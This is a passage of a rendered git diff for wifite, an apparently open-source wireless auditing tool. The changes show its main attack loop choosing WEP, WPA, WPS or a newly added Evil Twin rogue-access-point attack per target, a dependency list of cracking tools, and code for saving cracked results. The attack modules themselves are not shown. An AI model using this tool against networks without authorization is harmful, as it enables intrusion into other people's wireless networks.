Otherwise, prompts user to select targets and returns the selection.
|
|
||||||
'''
|
|
||||||
|
|
||||||
if self.target:
|
|
||||||
# When user specifies a specific target
|
|
||||||
return [self.target]
|
|
||||||
|
|
||||||
if len(self.targets) == 0:
|
if len(self.targets) == 0:
|
||||||
if self.err_msg is not None:
|
if self.err_msg is not None:
|
||||||
@@ -184,15 +177,13 @@ class Scanner(object):
|
|||||||
# 1. Link to wireless drivers wiki,
|
# 1. Link to wireless drivers wiki,
|
||||||
# 2. How to check if your device supporst monitor mode,
|
# 2. How to check if your device supporst monitor mode,
|
||||||
# 3. Provide airodump-ng command being executed.
|
# 3. Provide airodump-ng command being executed.
|
||||||
raise Exception('No targets found.'
|
raise Exception("No targets found."
|
||||||
+ ' You may need to wait longer,'
|
+ " You may need to wait longer,"
|
||||||
+ ' or you may have issues with your wifi card')
|
+ " or you may have issues with your wifi card")
|
||||||
|
|
||||||
# Return all targets if user specified a wait time ('pillage').
|
|
||||||
if Configuration.scan_time > 0:
|
if Configuration.scan_time > 0:
|
||||||
return self.targets
|
return self.targets
|
||||||
|
|
||||||
# Ask user for targets.
|
|
||||||
self.print_targets()
|
self.print_targets()
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
|
|
||||||
@@ -219,12 +210,12 @@ class Scanner(object):
|
|||||||
elif choice.isdigit():
|
elif choice.isdigit():
|
||||||
choice = int(choice) - 1
|
choice = int(choice) - 1
|
||||||
chosen_targets.append(self.targets[choice])
|
chosen_targets.append(self.targets[choice])
|
||||||
|
else:
|
||||||
|
pass
|
||||||
return chosen_targets
|
return chosen_targets
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
# 'Test' script will display targets and selects the appropriate one
|
# Example displays targets and selects the appropriate one
|
||||||
Configuration.initialize()
|
Configuration.initialize()
|
||||||
try:
|
try:
|
||||||
s = Scanner()
|
s = Scanner()
|
||||||
@@ -233,6 +224,6 @@ if __name__ == '__main__':
|
|||||||
Color.pl('\r {!} {R}Error{W}: %s' % str(e))
|
Color.pl('\r {!} {R}Error{W}: %s' % str(e))
|
||||||
Configuration.exit_gracefully(0)
|
Configuration.exit_gracefully(0)
|
||||||
for t in targets:
|
for t in targets:
|
||||||
Color.pl(' {W}Selected: %s' % t)
|
Color.pl(" {W}Selected: %s" % t)
|
||||||
Configuration.exit_gracefully(0)
|
Configuration.exit_gracefully(0)
|
||||||
|
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
import time
|
import time
|
||||||
@@ -32,8 +32,8 @@ class Timer(object):
|
|||||||
mins = (rem % 3600) / 60
|
mins = (rem % 3600) / 60
|
||||||
secs = rem % 60
|
secs = rem % 60
|
||||||
if hours > 0:
|
if hours > 0:
|
||||||
return '%dh%dm%ds' % (hours, mins, secs)
|
return "%dh%dm%ds" % (hours, mins, secs)
|
||||||
elif mins > 0:
|
elif mins > 0:
|
||||||
return '%dm%ds' % (mins, secs)
|
return "%dm%ds" % (mins, secs)
|
||||||
else:
|
else:
|
||||||
return '%ds' % secs
|
return "%ds" % secs
|
||||||
|
|||||||
287
wifite/wifite.py
287
wifite/wifite.py
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python3.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
try:
|
try:
|
||||||
@@ -6,93 +6,283 @@ try:
|
|||||||
except (ValueError, ImportError) as e:
|
except (ValueError, ImportError) as e:
|
||||||
raise Exception('You may need to run wifite from the root directory (which includes README.md)', e)
|
raise Exception('You may need to run wifite from the root directory (which includes README.md)', e)
|
||||||
|
|
||||||
|
from .util.scanner import Scanner
|
||||||
|
from .util.process import Process
|
||||||
from .util.color import Color
|
from .util.color import Color
|
||||||
|
from .util.crack import CrackHandshake
|
||||||
|
from .util.input import raw_input
|
||||||
|
from .attack.wep import AttackWEP
|
||||||
|
from .attack.wpa import AttackWPA
|
||||||
|
from .attack.wps import AttackWPS
|
||||||
|
from .attack.eviltwin import EvilTwinAttack
|
||||||
|
from .model.result import CrackResult
|
||||||
|
from .model.handshake import Handshake
|
||||||
|
|
||||||
|
import json
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
|
|
||||||
class Wifite(object):
|
class Wifite(object):
|
||||||
|
|
||||||
def __init__(self):
|
def main(self):
|
||||||
'''
|
''' Either performs action based on arguments, or starts attack scanning '''
|
||||||
Initializes Wifite. Checks for root permissions and ensures dependencies are installed.
|
|
||||||
'''
|
|
||||||
|
|
||||||
self.print_banner()
|
|
||||||
|
|
||||||
Configuration.initialize(load_interface=False)
|
|
||||||
|
|
||||||
if os.getuid() != 0:
|
if os.getuid() != 0:
|
||||||
Color.pl('{!} {R}error: {O}wifite{R} must be run as {O}root{W}')
|
Color.pl('{!} {R}error: {O}wifite{R} must be run as {O}root{W}')
|
||||||
Color.pl('{!} {R}re-run with {O}sudo{W}')
|
Color.pl('{!} {O}re-run as: sudo ./Wifite.py{W}')
|
||||||
Configuration.exit_gracefully(0)
|
Configuration.exit_gracefully(0)
|
||||||
|
|
||||||
from .tools.dependency import Dependency
|
Configuration.initialize(load_interface=False)
|
||||||
Dependency.run_dependency_check()
|
|
||||||
|
|
||||||
|
self.dependency_check()
|
||||||
def start(self):
|
|
||||||
'''
|
|
||||||
Starts target-scan + attack loop, or launches utilities dpeending on user input.
|
|
||||||
'''
|
|
||||||
from .model.result import CrackResult
|
|
||||||
from .model.handshake import Handshake
|
|
||||||
from .util.crack import CrackHelper
|
|
||||||
|
|
||||||
if Configuration.show_cracked:
|
if Configuration.show_cracked:
|
||||||
CrackResult.display()
|
self.display_cracked()
|
||||||
|
|
||||||
elif Configuration.check_handshake:
|
elif Configuration.check_handshake:
|
||||||
Handshake.check()
|
self.check_handshake(Configuration.check_handshake)
|
||||||
|
|
||||||
elif Configuration.crack_handshake:
|
elif Configuration.crack_handshake:
|
||||||
CrackHelper.run()
|
CrackHandshake()
|
||||||
|
|
||||||
else:
|
else:
|
||||||
Configuration.get_monitor_mode_interface()
|
Configuration.get_monitor_mode_interface()
|
||||||
self.scan_and_attack()
|
self.run()
|
||||||
|
|
||||||
|
|
||||||
def print_banner(self):
|
def dependency_check(self):
|
||||||
'''Displays ASCII art of the highest caliber.'''
|
''' Check that required programs are installed '''
|
||||||
Color.pl(r'{G} . {GR}{D} {W}{G} . {W}')
|
from .tools.airmon import Airmon
|
||||||
Color.pl(r'{G}.´ · .{GR}{D} {W}{G}. · `. {G}wifite {D}%s{W}' % Configuration.version)
|
from .tools.airodump import Airodump
|
||||||
Color.pl(r'{G}: : : {GR}{D} (¯) {W}{G} : : : {W}{D}automated wireless auditor{W}')
|
from .tools.aircrack import Aircrack
|
||||||
Color.pl(r'{G}`. · `{GR}{D} /¯\ {W}{G}´ · .´ {C}{D}https://github.com/derv82/wifite2{W}')
|
from .tools.aireplay import Aireplay
|
||||||
Color.pl(r'{G} ` {GR}{D}/¯¯¯\{W}{G} ´ {W}')
|
from .tools.ifconfig import Ifconfig
|
||||||
|
from .tools.iwconfig import Iwconfig
|
||||||
|
from .tools.hostapd import Hostapd
|
||||||
|
from .tools.dnsmasq import Dnsmasq
|
||||||
|
from .tools.iptables import Iptables
|
||||||
|
from .tools.bully import Bully
|
||||||
|
from .tools.reaver import Reaver
|
||||||
|
from .tools.wash import Wash
|
||||||
|
from .tools.pyrit import Pyrit
|
||||||
|
from .tools.tshark import Tshark
|
||||||
|
from .tools.macchanger import Macchanger
|
||||||
|
|
||||||
|
apps = [
|
||||||
|
# Aircrack
|
||||||
|
Airmon, Airodump, Aircrack, Aireplay,
|
||||||
|
# wireless/net tools
|
||||||
|
Iwconfig, Ifconfig,
|
||||||
|
# WPS
|
||||||
|
Reaver, Bully,
|
||||||
|
# Cracking/handshakes
|
||||||
|
Pyrit, Tshark,
|
||||||
|
# Misc
|
||||||
|
Macchanger
|
||||||
|
]
|
||||||
|
|
||||||
|
if Configuration.use_eviltwin:
|
||||||
|
apps.extend([Hostapd, Dnsmasq, Iptables])
|
||||||
|
|
||||||
|
missing_required = any([app.fails_dependency_check() for app in apps])
|
||||||
|
|
||||||
|
if missing_required:
|
||||||
|
Color.pl('{!} {R}required app(s) were not found, exiting.{W}')
|
||||||
|
sys.exit(-1)
|
||||||
|
|
||||||
|
#if missing_optional:
|
||||||
|
# Color.pl('{!} {O}recommended app(s) were not found')
|
||||||
|
# Color.pl('{!} {O}wifite may not work as expected{W}')
|
||||||
|
|
||||||
|
def display_cracked(self):
|
||||||
|
''' Show cracked targets from cracked.txt '''
|
||||||
|
name = CrackResult.cracked_file
|
||||||
|
if not os.path.exists(name):
|
||||||
|
Color.pl('{!} {O}file {C}%s{O} not found{W}' % name)
|
||||||
|
return
|
||||||
|
|
||||||
|
with open(name, 'r') as fid:
|
||||||
|
cracked_targets = json.loads(fid.read())
|
||||||
|
|
||||||
|
if len(cracked_targets) == 0:
|
||||||
|
Color.pl('{!} {R}no results found in {O}%s{W}' % name)
|
||||||
|
else:
|
||||||
|
Color.pl('{+} displaying {G}%d {C}cracked target(s){W}\n' % len(cracked_targets))
|
||||||
|
for item in cracked_targets:
|
||||||
|
cr = CrackResult.load(item)
|
||||||
|
cr.dump()
|
||||||
Color.pl('')
|
Color.pl('')
|
||||||
|
|
||||||
|
def check_handshake(self, capfile):
|
||||||
|
''' Analyzes .cap file for handshake '''
|
||||||
|
if capfile == '<all>':
|
||||||
|
Color.pl('{+} checking all handshakes in {G}"./hs"{W} directory\n')
|
||||||
|
try:
|
||||||
|
capfiles = [os.path.join('hs', x) for x in os.listdir('hs') if x.endswith('.cap')]
|
||||||
|
except OSError as e:
|
||||||
|
capfiles = []
|
||||||
|
if len(capfiles) == 0:
|
||||||
|
Color.pl('{!} {R}no .cap files found in {O}"./hs"{W}\n')
|
||||||
|
else:
|
||||||
|
capfiles = [capfile]
|
||||||
|
|
||||||
def scan_and_attack(self):
|
for capfile in capfiles:
|
||||||
|
Color.pl('{+} checking for handshake in .cap file {C}%s{W}' % capfile)
|
||||||
|
if not os.path.exists(capfile):
|
||||||
|
Color.pl('{!} {O}.cap file {C}%s{O} not found{W}' % capfile)
|
||||||
|
return
|
||||||
|
hs = Handshake(capfile, bssid=Configuration.target_bssid, essid=Configuration.target_essid)
|
||||||
|
hs.analyze()
|
||||||
|
Color.pl('')
|
||||||
|
|
||||||
|
def run(self):
|
||||||
'''
|
'''
|
||||||
|
Main program.
|
||||||
1) Scans for targets, asks user to select targets
|
1) Scans for targets, asks user to select targets
|
||||||
2) Attacks each target
|
2) Attacks each target
|
||||||
'''
|
'''
|
||||||
from .util.scanner import Scanner
|
|
||||||
from .attack.all import AttackAll
|
|
||||||
|
|
||||||
Color.pl('')
|
|
||||||
|
|
||||||
# Scan
|
|
||||||
s = Scanner()
|
s = Scanner()
|
||||||
|
if s.target:
|
||||||
|
# We found the target we want
|
||||||
|
targets = [s.target]
|
||||||
|
else:
|
||||||
targets = s.select_targets()
|
targets = s.select_targets()
|
||||||
|
|
||||||
# Attack
|
if Configuration.use_eviltwin:
|
||||||
attacked_targets = AttackAll.attack_multiple(targets)
|
# Ask user to select interface if needed
|
||||||
|
Configuration.get_eviltwin_interface()
|
||||||
|
|
||||||
Color.pl('{+} Finished attacking {C}%d{W} target(s), exiting' % attacked_targets)
|
attacked_targets = 0
|
||||||
|
targets_remaining = len(targets)
|
||||||
|
for idx, t in enumerate(targets, start=1):
|
||||||
|
attacked_targets += 1
|
||||||
|
targets_remaining -= 1
|
||||||
|
|
||||||
|
Color.pl('\n{+} ({G}%d{W}/{G}%d{W})' % (idx, len(targets)) +
|
||||||
|
' starting attacks against {C}%s{W} ({C}%s{W})'
|
||||||
|
% (t.bssid, t.essid if t.essid_known else "{O}ESSID unknown"))
|
||||||
|
|
||||||
##############################################################
|
# TODO: Check if Eviltwin attack is selected.
|
||||||
|
|
||||||
|
if Configuration.use_eviltwin:
|
||||||
|
attack = EvilTwinAttack(t, Configuration.interface, Configuration.eviltwin_iface)
|
||||||
|
|
||||||
def entry_point():
|
elif 'WEP' in t.encryption:
|
||||||
|
attack = AttackWEP(t)
|
||||||
|
|
||||||
|
elif 'WPA' in t.encryption:
|
||||||
|
# TODO: Move WPS+WPA decision to a combined attack
|
||||||
|
if t.wps:
|
||||||
|
attack = AttackWPS(t)
|
||||||
|
result = False
|
||||||
try:
|
try:
|
||||||
wifite = Wifite()
|
result = attack.run()
|
||||||
wifite.start()
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
Color.pexception(e)
|
Color.pl("\n{!} {R}Error: {O}%s" % str(e))
|
||||||
|
if Configuration.verbose > 0 or Configuration.print_stack_traces:
|
||||||
|
Color.pl('\n{!} {O}Full stack trace below')
|
||||||
|
from traceback import format_exc
|
||||||
|
Color.p('\n{!} ')
|
||||||
|
err = format_exc().strip()
|
||||||
|
err = err.replace('\n', '\n{W}{!} {W} ')
|
||||||
|
err = err.replace(' File', '{W}{D}File')
|
||||||
|
err = err.replace(' Exception: ', '{R}Exception: {O}')
|
||||||
|
Color.pl(err)
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
Color.pl('\n{!} {O}interrupted{W}\n')
|
||||||
|
if not self.user_wants_to_continue(targets_remaining, 1):
|
||||||
|
break
|
||||||
|
|
||||||
|
if result and attack.success:
|
||||||
|
# We cracked it.
|
||||||
|
attack.crack_result.save()
|
||||||
|
continue
|
||||||
|
else:
|
||||||
|
# WPS failed, try WPA handshake.
|
||||||
|
attack = AttackWPA(t)
|
||||||
|
else:
|
||||||
|
# Not using WPS, try WPA handshake.
|
||||||
|
attack = AttackWPA(t)
|
||||||
|
else:
|
||||||
|
Color.pl("{!} {R}Error: {O}unable to attack: encryption not WEP or WPA")
|
||||||
|
continue
|
||||||
|
|
||||||
|
try:
|
||||||
|
attack.run()
|
||||||
|
except Exception as e:
|
||||||
|
Color.pl("\n{!} {R}Error: {O}%s" % str(e))
|
||||||
|
if Configuration.verbose > 0 or True:
|
||||||
|
Color.pl('\n{!} {O}Full stack trace below')
|
||||||
|
from traceback import format_exc
|
||||||
|
Color.p('\n{!} ')
|
||||||
|
err = format_exc().strip()
|
||||||
|
err = err.replace('\n', '\n{W}{!} {W} ')
|
||||||
|
err = err.replace(' File', '{W}{D}File')
|
||||||
|
err = err.replace(' Exception: ', '{R}Exception: {O}')
|
||||||
|
Color.pl(err)
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
Color.pl('\n{!} {O}interrupted{W}\n')
|
||||||
|
if not self.user_wants_to_continue(targets_remaining):
|
||||||
|
break
|
||||||
|
|
||||||
|
if attack.success:
|
||||||
|
attack.crack_result.save()
|
||||||
|
Color.pl("{+} Finished attacking {C}%d{W} target(s), exiting" % attacked_targets)
|
||||||
|
|
||||||
|
|
||||||
|
def print_banner(self):
|
||||||
|
""" Displays ASCII art of the highest caliber. """
|
||||||
|
Color.pl('''\
|
||||||
|
{G} . {GR}{D} {W}{G} . {W}
|
||||||
|
{G}.´ · .{GR}{D} {W}{G}. · `. {G}wifite {D}%s{W}
|
||||||
|
{G}: : : {GR}{D} (¯) {W}{G} : : : {W}{D}automated wireless auditor
|
||||||
|
{G}`. · `{GR}{D} /¯\ {W}{G}´ · .´ {C}{D}https://github.com/derv82/wifite2
|
||||||
|
{G} ` {GR}{D}/¯¯¯\{W}{G} ´ {W}
|
||||||
|
''' % Configuration.version)
|
||||||
|
|
||||||
|
def user_wants_to_continue(self, targets_remaining, attacks_remaining=0):
|
||||||
|
''' Asks user if attacks should continue onto other targets '''
|
||||||
|
if attacks_remaining == 0 and targets_remaining == 0:
|
||||||
|
# No targets or attacksleft, drop out
|
||||||
|
return
|
||||||
|
|
||||||
|
prompt_list = []
|
||||||
|
if attacks_remaining > 0:
|
||||||
|
prompt_list.append(Color.s('{C}%d{W} attack(s)' % attacks_remaining))
|
||||||
|
if targets_remaining > 0:
|
||||||
|
prompt_list.append(Color.s('{C}%d{W} target(s)' % targets_remaining))
|
||||||
|
prompt = ' and '.join(prompt_list)
|
||||||
|
Color.pl('{+} %s remain, do you want to continue?' % prompt)
|
||||||
|
|
||||||
|
prompt = Color.s('{+} type {G}c{W} to {G}continue{W}' +
|
||||||
|
' or {R}s{W} to {R}stop{W}: ')
|
||||||
|
|
||||||
|
if raw_input(prompt).lower().startswith('s'):
|
||||||
|
return False
|
||||||
|
else:
|
||||||
|
return True
|
||||||
|
|
||||||
|
|
||||||
|
def run():
|
||||||
|
w = Wifite()
|
||||||
|
w.print_banner()
|
||||||
|
|
||||||
|
try:
|
||||||
|
w.main()
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
Color.pl('\n{!} {R}Error:{O} %s{W}' % str(e))
|
||||||
|
|
||||||
|
if Configuration.verbose > 0 or True:
|
||||||
|
Color.pl('\n{!} {O}Full stack trace below')
|
||||||
|
from traceback import format_exc
|
||||||
|
Color.p('\n{!} ')
|
||||||
|
err = format_exc().strip()
|
||||||
|
err = err.replace('\n', '\n{W}{!} {W} ')
|
||||||
|
err = err.replace(' File', '{W}{D}File')
|
||||||
|
err = err.replace(' Exception: ', '{R}Exception: {O}')
|
||||||
|
Color.pl(err)
|
||||||
|
|
||||||
Color.pl('\n{!} {R}Exiting{W}\n')
|
Color.pl('\n{!} {R}Exiting{W}\n')
|
||||||
|
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
@@ -100,6 +290,5 @@ def entry_point():
|
|||||||
|
|
||||||
Configuration.exit_gracefully(0)
|
Configuration.exit_gracefully(0)
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
entry_point()
|
run()
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
Reference in New Issue
Block a user